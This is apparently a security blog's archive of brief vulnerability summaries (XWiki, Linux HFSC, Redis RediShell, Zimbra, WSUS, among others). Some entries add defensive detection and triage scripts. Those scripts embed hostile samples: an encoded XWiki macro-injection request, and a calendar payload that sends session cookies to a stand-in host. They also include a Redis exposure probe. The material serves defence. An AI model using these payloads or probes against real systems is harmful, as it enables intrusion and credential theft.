Category Archives: Vulnerability

About Remote Code Execution – XWiki Platform (CVE-2025-24893) vulnerability


About Remote Code Execution – XWiki Platform (CVE-2025-24893) vulnerability. XWiki is a free, open-source wiki platform written in Java with a strong focus on extensibility. It supports WYSIWYG editing, import and export of documents in OpenDocument format, annotations and tags, and flexible access-rights management. The vulnerability allows an attacker with guest-level privileges, i.e. anyone who can reach a wiki that permits guest access, to execute arbitrary code on the server by sending a crafted request to the SolrSearch page: the search text is rendered as wiki syntax without escaping, so macros embedded in it (the public PoC closes the surrounding syntax and opens {{async}} and {{groovy}} macros) are executed server-side.

⚙️ The vulnerability was fixed in versions 15.10.11, 16.4.1 and 16.5.0RC1, released in July 2024.

🛠 A proof-of-concept (PoC) exploit was available in the original issue for ZDI-CAN-23994, as well as in the security advisory published on February 20, 2025. There are now more than 30 exploit variants on GitHub.

👾 On October 28, VulnCheck reported that the vulnerability was being exploited in the wild to deploy cryptominers. On October 30, it was added to the CISA KEV catalog.
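Since the attack vector is a single crafted request to SolrSearch, the cheapest retrospective check is to look for wiki-macro syntax in the `text` parameter of requests to that page in the reverse-proxy or Tomcat access logs. The script below is an added example written for this post, not code from XWiki or from the original article; the log lines are constructed, and the macro list is an assumption based on the public PoC (the `{{async}}`/`{{groovy}}` pattern) plus the other script macros that exploit variants commonly substitute.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Wiki-macro openers that have no business in a search string. The public PoC
# for CVE-2025-24893 breaks out of the surrounding syntax with "}}}" and then
# opens {{async}} and {{groovy}}; variants use {{velocity}}, {{python}} or {{script}}.
MACRO_OPENER = re.compile(r"\{\{\s*(async|groovy|velocity|python|script)\b", re.I)

# Constructed sample lines in Apache/nginx "combined" log format (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Oct/2025:10:00:01 +0000] "GET /xwiki/bin/get/Main/SolrSearch'
    '?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D'
    'println%28%22x%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 200 512',
    '198.51.100.7 - - [28/Oct/2025:10:00:02 +0000] "GET /xwiki/bin/view/Main/SolrSearch'
    '?text=quarterly+report HTTP/1.1" 200 8192',
    '198.51.100.8 - - [28/Oct/2025:10:00:03 +0000] "GET /xwiki/bin/view/Main/WebHome'
    ' HTTP/1.1" 200 4096',
]

def decoded_param(url, name):
    """Return all values of query parameter `name`, percent-decoded until stable,
    so that double-encoded payloads (%257B -> %7B -> {) are unwrapped as well."""
    values = parse_qs(urlsplit(url).query, keep_blank_values=True).get(name, [])
    out = []
    for v in values:
        prev = None
        while prev != v:
            prev, v = v, unquote(v)
        out.append(v)
    return out

def is_solrsearch_injection(url):
    """True if the request targets a SolrSearch page and its `text` parameter
    carries a wiki-macro opener."""
    if "/SolrSearch" not in urlsplit(url).path:
        return False
    return any(MACRO_OPENER.search(v) for v in decoded_param(url, "text"))

LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

def scan_access_log(lines):
    """Return [(client_ip, url)] for suspicious SolrSearch requests."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m and is_solrsearch_injection(m.group(2)):
            hits.append((m.group(1), m.group(2)))
    return hits

if __name__ == "__main__":
    for ip, url in scan_access_log(SAMPLE_LOG):
        print(f"suspicious SolrSearch request from {ip}: {url[:80]}...")
```

Access logs only record the query string, so a payload delivered in a POST body would not be visible here; the check is a triage aid, not a substitute for upgrading to a fixed version.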

In Russian

About Elevation of Privilege – Linux Kernel (CVE-2025-38001) vulnerability


About Elevation of Privilege – Linux Kernel (CVE-2025-38001) vulnerability. It affects the HFSC (Hierarchical Fair Service Curve) packet scheduler, sch_hfsc, in the kernel's traffic-control (net_sched) subsystem. A local attacker with an unprivileged account can exploit this flaw to gain root privileges. Configuring a qdisc requires CAP_NET_ADMIN, which an unprivileged process normally obtains by creating its own user and network namespaces; that is why disabling unprivileged user namespaces, or preventing sch_hfsc from loading, is the usual stop-gap for net_sched bugs of this kind until the kernel is updated.

⚙️ This vulnerability is from the June Linux Patch Wednesday. In the Vulristics report, it was no different from 354 other Linux Kernel vulnerabilities: the NVD provides a lengthy description that doesn’t clearly indicate the real-world impact of exploitation, and there is no CVSS vector. Classic. 🙄

🛠 About a month after the updates were released in Linux distributions, on July 11, a write-up and a public exploit for this vulnerability were published. In the demo video, a local attacker downloads and executes a binary, after which they obtain a root shell and read the contents of /etc/shadow. The release of this exploit barely attracted attention on specialized media platforms. 🤷‍♂️

👾 So far, there are no reports of this flaw being exploited in the wild.
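A quick way to decide whether an unpatched host is actually exposed is to check whether the sch_hfsc code is reachable at all and whether unprivileged users can obtain the CAP_NET_ADMIN they need to configure it. The script below is an added example written for this post, not code from the kernel, the exploit author or the original article. The sample `/proc/modules`, `modules.builtin`, sysctl and modprobe.d contents are constructed; the sysctl names are the real Debian/Ubuntu (`kernel.unprivileged_userns_clone`, `kernel.apparmor_restrict_unprivileged_userns`) and mainline (`user.max_user_namespaces`) knobs, and treating any of them as "disabled" is a heuristic.

```python
import platform
from pathlib import Path

# Constructed sample inputs (not taken from a real host).
SAMPLE_PROC_MODULES = """\
sch_hfsc 28672 1 - Live 0x0000000000000000
nf_tables 372736 0 - Live 0x0000000000000000
"""
SAMPLE_MODULES_BUILTIN = "kernel/net/sched/sch_fq_codel.ko\n"
SAMPLE_SYSCTLS = {
    "kernel.unprivileged_userns_clone": "1",               # Debian/Ubuntu knob
    "user.max_user_namespaces": "28633",                   # mainline limit
    "kernel.apparmor_restrict_unprivileged_userns": "0",   # Ubuntu 23.10+ knob
}
SAMPLE_MODPROBE_CONF = "install sch_hfsc /bin/false\n"

def hfsc_loaded(proc_modules_text):
    """True if sch_hfsc is currently loaded (/proc/modules lists the name first)."""
    return any(line.split()[0] == "sch_hfsc"
               for line in proc_modules_text.splitlines() if line.strip())

def hfsc_builtin(modules_builtin_text):
    """True if HFSC is compiled into the kernel (CONFIG_NET_SCH_HFSC=y); such
    code never shows up in /proc/modules and cannot be blocked via modprobe."""
    return any(line.strip().endswith("/sch_hfsc.ko")
               for line in modules_builtin_text.splitlines())

def hfsc_autoload_blocked(modprobe_conf_text):
    """True if an `install sch_hfsc /bin/false` rule exists. Without it,
    `tc qdisc add ... hfsc` makes the kernel request_module("sch_hfsc") on demand,
    so "not loaded" alone does not mean "not reachable"."""
    for line in modprobe_conf_text.splitlines():
        parts = line.split()
        if (len(parts) >= 3 and parts[0] == "install" and parts[1] == "sch_hfsc"
                and parts[2] in ("/bin/false", "/bin/true")):
            return True
    return False

def unprivileged_userns_allowed(sysctls):
    """Heuristic: can an unprivileged user create a user namespace and thereby
    gain CAP_NET_ADMIN inside it? Missing keys (other distros) are ignored."""
    if sysctls.get("kernel.unprivileged_userns_clone") == "0":
        return False
    if sysctls.get("user.max_user_namespaces") == "0":
        return False
    if sysctls.get("kernel.apparmor_restrict_unprivileged_userns") == "1":
        return False
    return True

def triage(proc_modules_text, modules_builtin_text, sysctls, modprobe_conf_text):
    """Verdict for an UNPATCHED kernel: 'exposed' means an unprivileged local
    user can reach the HFSC qdisc code."""
    reachable = (hfsc_loaded(proc_modules_text) or hfsc_builtin(modules_builtin_text)
                 or not hfsc_autoload_blocked(modprobe_conf_text))
    if not reachable:
        return "not reachable: sch_hfsc not loaded and autoload blocked"
    if not unprivileged_userns_allowed(sysctls):
        return "mitigated: unprivileged user namespaces disabled, qdisc setup needs CAP_NET_ADMIN"
    return "exposed: sch_hfsc reachable and unprivileged user namespaces allowed"

def read_sysctls(keys):
    """Read the given sysctls from /proc/sys; keys absent on this kernel are skipped."""
    out = {}
    for key in keys:
        path = Path("/proc/sys") / key.replace(".", "/")
        if path.exists():
            out[key] = path.read_text().strip()
    return out

if __name__ == "__main__":
    conf_dir = Path("/etc/modprobe.d")
    modprobe = "".join(p.read_text() for p in conf_dir.glob("*.conf")) if conf_dir.is_dir() else ""
    builtin = Path(f"/lib/modules/{platform.release()}/modules.builtin")
    print(triage(Path("/proc/modules").read_text(),
                 builtin.read_text() if builtin.exists() else "",
                 read_sysctls(SAMPLE_SYSCTLS), modprobe))
```

The verdict says nothing about whether the kernel is patched; compare the running kernel against your distribution's advisory for CVE-2025-38001 first, and use the checks above only to prioritise hosts that cannot be rebooted immediately.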

In Russian

About Remote Code Execution – Redis “RediShell” (CVE-2025-49844) vulnerability


About Remote Code Execution – Redis “RediShell” (CVE-2025-49844) vulnerability. Redis is a popular in-memory key–value database, used as a distributed cache and message broker, with optional persistence. The vulnerability is a use-after-free in the Lua interpreter embedded in Redis: a remote authenticated attacker who is allowed to run EVAL/EVALSHA can execute arbitrary code in the redis-server process via a specially crafted Lua script. The requirement for authentication does not reduce its severity, because Redis ships without a password by default and authentication is often never configured. 🤷‍♂️ Where upgrading has to wait, Lua scripting can be withdrawn from accounts that do not need it with the ACL rule -@scripting, which removes the attack path for those users.

⚙️ The vulnerability was discovered by Wiz researchers and demonstrated at Pwn2Own Berlin in May 2025; it was fixed on October 3 in version 8.2.2, with backports to the supported branches (8.0.4, 7.4.6, 7.2.11 and 6.2.20).

🛠 As of October 7, a public exploit for the vulnerability is available on GitHub.

👾 There are no reports of attacks so far.

🌐 As of October 7, 330,000 Redis instances were accessible on the Internet, of which 60,000 had no authentication.
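The exposure numbers above combine two conditions: the instance answers on the network, and it answers an unauthenticated client. A third one matters for RediShell, namely whether that client may run Lua at all. The probe below checks all three with a minimal RESP client so that it runs anywhere Python does, without redis-py. It is an added example written for this post, not code from Redis, Wiz or the original article; the host and port passed to `probe()` are placeholders, and the verdict strings are this example's own.

```python
import socket

class RespError:
    """A RESP error reply ("-ERR ...") carried as a value rather than raised."""
    def __init__(self, message):
        self.message = message
    def __repr__(self):
        return f"RespError({self.message!r})"

def resp_encode(*args):
    """Encode a command as a RESP array of bulk strings, e.g. *1\\r\\n$4\\r\\nPING\\r\\n."""
    parts = [b"*%d\r\n" % len(args)]
    for a in args:
        b = a if isinstance(a, bytes) else str(a).encode()
        parts.append(b"$%d\r\n%s\r\n" % (len(b), b))
    return b"".join(parts)

def resp_decode(buf):
    """Decode one RESP2 reply from buf; returns (value, remaining bytes)."""
    kind, rest = buf[:1], buf[1:]
    line, _, rest = rest.partition(b"\r\n")
    if kind == b"+":
        return line.decode(), rest
    if kind == b"-":
        return RespError(line.decode()), rest
    if kind == b":":
        return int(line), rest
    if kind == b"$":
        n = int(line)
        if n < 0:
            return None, rest                      # null bulk string
        return rest[:n], rest[n + 2:]              # skip payload and its CRLF
    if kind == b"*":
        items = []
        for _ in range(int(line)):
            item, rest = resp_decode(rest)
            items.append(item)
        return items, rest
    raise ValueError(f"unknown RESP type {kind!r}")

def classify(ping_reply, eval_reply):
    """Turn the replies to PING and to a harmless EVAL into an exposure verdict."""
    if isinstance(ping_reply, RespError):
        if ping_reply.message.startswith("NOAUTH"):
            return "auth required"        # reachable, but a password/ACL is enforced
        if ping_reply.message.startswith("DENIED"):
            return "protected mode"       # default when no password and non-loopback bind
        return "error: " + ping_reply.message
    if isinstance(eval_reply, RespError):
        if eval_reply.message.startswith("NOPERM"):
            return "open, scripting denied by ACL"
        return "open, EVAL error: " + eval_reply.message
    return "open, scripting enabled"      # anyone on the network can run Lua: RediShell exposure

def probe(host, port=6379, timeout=3.0):
    """Connect without credentials, pipeline PING and EVAL, and classify the answers."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(resp_encode("PING") + resp_encode("EVAL", "return 1", 0))
        data = b""
        while data.count(b"\r\n") < 2:            # two single-line replies expected
            chunk = s.recv(4096)
            if not chunk:                         # protected mode closes after one reply
                break
            data += chunk
    ping, rest = resp_decode(data)
    eval_reply = resp_decode(rest)[0] if rest else RespError("no reply")
    return classify(ping, eval_reply)

if __name__ == "__main__":
    print(probe("127.0.0.1"))   # placeholder target; run against your own instances only
```

Any host that comes back as "open, scripting enabled" should be treated as unauthenticated RCE until it is upgraded; the configuration side of the fix is `requirepass` or a named ACL user, `bind` limited to the interfaces that actually need access, `protected-mode yes`, and `-@scripting` on every user that does not run Lua.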

In Russian

About Elevation of Privilege – Windows Agere Modem Driver (CVE-2025-24990) vulnerability


About Elevation of Privilege – Windows Agere Modem Driver (CVE-2025-24990) vulnerability. The vulnerability is from Microsoft’s October Patch Tuesday. The Agere Modem Driver (ltmdm64.sys) is a third-party kernel driver that lets a computer talk to an Agere (later LSI) modem for dial-up or fax connections. 📠🙄 Despite its questionable practical usefulness, the driver continued to ship with Windows, and as a kernel-mode component it is reachable from any local user. A local attacker who successfully exploits this vulnerability can obtain administrative privileges.

⚙️ Rather than fixing the driver, the Microsoft cumulative update from October 14 removes ltmdm64.sys from the system entirely; fax-modem hardware that depends on this driver stops working after the update.

🛠 On October 16, an exploit for the vulnerability was published on GitHub. The author reports that the driver has been shipped since Windows Vista. Microsoft had known about the issue since at least 2014 (11 years ❗️) but ignored it. 🤷‍♂️

👾 On October 22, this vulnerability was added to the CISA KEV; details about active attacks are not yet known.

In Russian

About Cross Site Scripting – Zimbra Collaboration (CVE-2025-27915) vulnerability


About Cross Site Scripting – Zimbra Collaboration (CVE-2025-27915) vulnerability. Zimbra Collaboration is a mail and collaboration suite, broadly comparable to Microsoft Exchange. The vulnerability is a stored XSS in the web mail client (Classic Web Client): an unauthenticated attacker only needs to send the victim an email with a specially crafted ICS (iCalendar) attachment, and the embedded JavaScript runs in the context of the victim’s session as soon as the message is viewed in the web interface.
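Mail-borne ICS payloads can be caught at the gateway before they reach the web client: iCalendar text properties may carry HTML (Outlook routinely sends `X-ALT-DESC;FMTTYPE=text/html`), but they have no reason to carry inline event handlers, `<script>`-like elements or `javascript:` URLs. The scanner below is an added example written for this post, not code from Zimbra, StrikeReady Labs or the original article; both ICS samples are constructed, and the regexes are heuristics for script-capable HTML rather than a signature of the specific exploit.

```python
import re

# Constructed ICS samples (not real messages). The second one hides an event
# handler across an RFC 5545 folded line, which is why unfolding comes first.
BENIGN_ICS = """\
BEGIN:VCALENDAR
VERSION:2.0
BEGIN:VEVENT
UID:constructed-1@example.invalid
SUMMARY:Quarterly review
DESCRIPTION:Agenda attached\\, see the HTML version
X-ALT-DESC;FMTTYPE=text/html:<html><body><b>Agenda</b><br>10:00 kick-off</body></html>
END:VEVENT
END:VCALENDAR
"""

MALICIOUS_ICS = """\
BEGIN:VCALENDAR
VERSION:2.0
BEGIN:VEVENT
UID:constructed-2@example.invalid
SUMMARY:Invoice
DESCRIPTION:<details open ontoggle="fetch('https://collector.invalid/?c='+docum
 ent.cookie)">open me</details>
LOCATION:<a href="javascript:alert(1)">map</a>
END:VEVENT
END:VCALENDAR
"""

def unfold(text):
    """Join RFC 5545 folded lines: a line starting with SPACE or HTAB continues the previous one."""
    lines = []
    for raw in text.splitlines():
        if raw[:1] in (" ", "\t") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines

def properties(text):
    """Yield (NAME, params, value) per content line, with ICS text escapes undone
    so that a payload split by \\n or \\, is reassembled before matching."""
    for line in unfold(text):
        if ":" not in line:
            continue
        head, _, value = line.partition(":")
        name, _, params = head.partition(";")
        value = (value.replace("\\n", "\n").replace("\\N", "\n")
                      .replace("\\,", ",").replace("\\;", ";"))
        yield name.upper(), params, value

# Only flag what can execute script: an on*= attribute inside a tag, an
# active element, or a javascript: URL. Plain markup is left alone.
EVENT_HANDLER = re.compile(r"<[^>]*\bon[a-z]+\s*=", re.I)
ACTIVE_CONTENT = re.compile(r"<\s*(script|iframe|object|embed|svg|math)\b|javascript:", re.I)

def suspicious_properties(ics_text):
    """Return [(property name, reason)] for values carrying script-capable HTML."""
    hits = []
    for name, _params, value in properties(ics_text):
        if EVENT_HANDLER.search(value):
            hits.append((name, "inline event handler"))
        elif ACTIVE_CONTENT.search(value):
            hits.append((name, "active element or javascript: URL"))
    return hits

if __name__ == "__main__":
    for label, ics in (("benign", BENIGN_ICS), ("malicious", MALICIOUS_ICS)):
        print(label, suspicious_properties(ics))
```

Run `suspicious_properties()` over every `text/calendar` part at the mail gateway and quarantine or strip the attachment on a hit; the unfolding step is the part most home-grown filters forget, and it is exactly where a payload can be split to dodge a naive substring match.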

⚙️ The vulnerability was patched on January 27 in versions 9.0.0 Patch 44, 10.0.13, 10.1.5, as well as in the unofficial free Zimbra FOSS build from Maldua.

🛠 On September 30, StrikeReady Labs published a vulnerability analysis with a public exploit.

👾 StrikeReady Labs reported the vulnerability was exploited against Brazil’s military in January, before the patch was released. The vulnerability was added to CISA KEV on October 7.

In Russian

About Remote Code Execution – Windows Server Update Services (WSUS) (CVE-2025-59287) vulnerability


About Remote Code Execution – Windows Server Update Services (WSUS) (CVE-2025-59287) vulnerability. WSUS is a legacy Windows Server component that lets IT administrators manage the download and installation of Microsoft product updates on computers within a local network. An unauthenticated remote attacker can execute code with SYSTEM privileges on a Windows server that has the WSUS Server Role enabled (it is disabled by default) by sending specially crafted POST requests to the WSUS web services, which listen on TCP 8530 (HTTP) and 8531 (HTTPS). The root cause is deserialization of untrusted data.

⚙️ Initial patches were released on October 14 as part of Microsoft’s October Patch Tuesday.

🛠 A public exploit has been available on GitHub since October 18.

⚙️ On October 24, Microsoft released an out-of-band update that fully addresses the vulnerability (a server reboot is required). Until it is installed, Microsoft’s workarounds are to disable the WSUS Server Role or to block inbound traffic to TCP ports 8530 and 8531 on the host firewall; both also stop clients from receiving updates through that server.

👾 On October 24, the vulnerability was added to the CISA KEV, and there are reports of observed exploitation attempts.

In Russian

October Linux Patch Wednesday


October Linux Patch Wednesday. In October, Linux vendors began addressing 801 vulnerabilities, slightly more than in September. Of these, 546 are in the Linux Kernel. One is being exploited in the wild:

🔻 EoP – VMware Tools (CVE-2025-41244). This vulnerability has been exploited since October 2024, and public exploits are available. According to the description, exploitation requires VMware Aria Operations.

Public or suspected exploits exist for 39 more vulnerabilities, including:

🔸 RCE – Redis (CVE-2025-49844 – RediShell, CVE-2025-46817), OpenSSH (CVE-2025-61984), 7-Zip (CVE-2025-11001, CVE-2025-11002)
🔸 EoP – FreeIPA (CVE-2025-7493), Asterisk (CVE-2025-1131)
🔸 SQLi – MapServer (CVE-2025-59431)
🔸 SFB – authlib (CVE-2025-59420)
🔸 MemCor – Binutils (CVE-2025-11082 and 7 more), Open Babel (CVE-2025-10995 and 6 more)

🗒 Full Vulristics report

In Russian